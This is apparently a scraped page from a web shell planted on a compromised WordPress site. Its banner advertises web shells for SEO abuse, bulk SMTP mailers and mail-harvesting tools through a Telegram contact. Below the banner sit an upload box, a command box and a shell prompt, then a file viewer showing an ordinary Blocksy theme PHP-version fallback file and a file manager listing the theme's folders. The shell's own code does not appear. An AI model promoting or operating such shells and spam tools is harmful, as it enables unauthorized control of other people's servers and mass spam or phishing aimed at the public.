__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

if (! function_exists('blocksy_switch_theme')) {
	function blocksy_switch_theme() {
		switch_theme( WP_DEFAULT_THEME );
		unset( $_GET['activated'] );
		add_action( 'admin_notices', 'blocksy_upgrade_notice' );
	}
}
add_action( 'after_switch_theme', 'blocksy_switch_theme' );

if (! function_exists('blocksy_upgrade_notice')) {
	function blocksy_upgrade_notice() {
		$message = blocksy_safe_sprintf(
			// translators: placeholder here is the actual PHP version.
			__( 'Blocksy requires at least PHP version 5.7.0. You are running version %s. Please upgrade and try again.', 'blocksy' ),
			PHP_VERSION
		);

		printf( '<div class="error"><p>%s</p></div>', wp_kses_post($message) );
	}
}

if (! function_exists('blocksy_customize')) {
	function blocksy_customize() {
		wp_die( blocksy_safe_sprintf(
			// translators: placeholder here is the actual PHP version.
			esc_html(__( 'Blocksy requires at least PHP version 5.7.0. You are running version %s. Please upgrade and try again.', 'blocksy' )),
			PHP_VERSION
		), '', array(
			'back_link' => true,
		) );
	}
}
add_action( 'load-customize.php', 'blocksy_customize' );

if (! function_exists('blocksy_preview')) {
	function blocksy_preview() {
		if ( isset( $_GET['preview'] ) ) {
			wp_die( blocksy_safe_sprintf(
				// translators: placeholder here is the actual PHP version.
				esc_html(__( 'Blocksy requires at least PHP version 5.7.0. You are running version %s. Please upgrade and try again.', 'blocksy' )),
				PHP_VERSION
			) );
		}
	}
}
add_action( 'template_redirect', 'blocksy_preview' );

Filemanager

Name Type Size Permission Actions
classes Folder 0750
components Folder 0750
css Folder 0750
customizer Folder 0750
dynamic-styles Folder 0750
helpers Folder 0750
integrations Folder 0750
options Folder 0750
panel-builder Folder 0750
dynamic-css.php File 10.97 KB 0640
footer.php File 1.88 KB 0640
helpers.php File 7.14 KB 0640
init.php File 20.26 KB 0640
manager.php File 10.21 KB 0640
meta-boxes.php File 2.28 KB 0640
php-fallback.php File 1.53 KB 0640
schema-org.php File 5.46 KB 0640
sidebar.php File 5.11 KB 0640
template-actions.php File 336 B 0640
template-tags.php File 15.2 KB 0640
Filemanager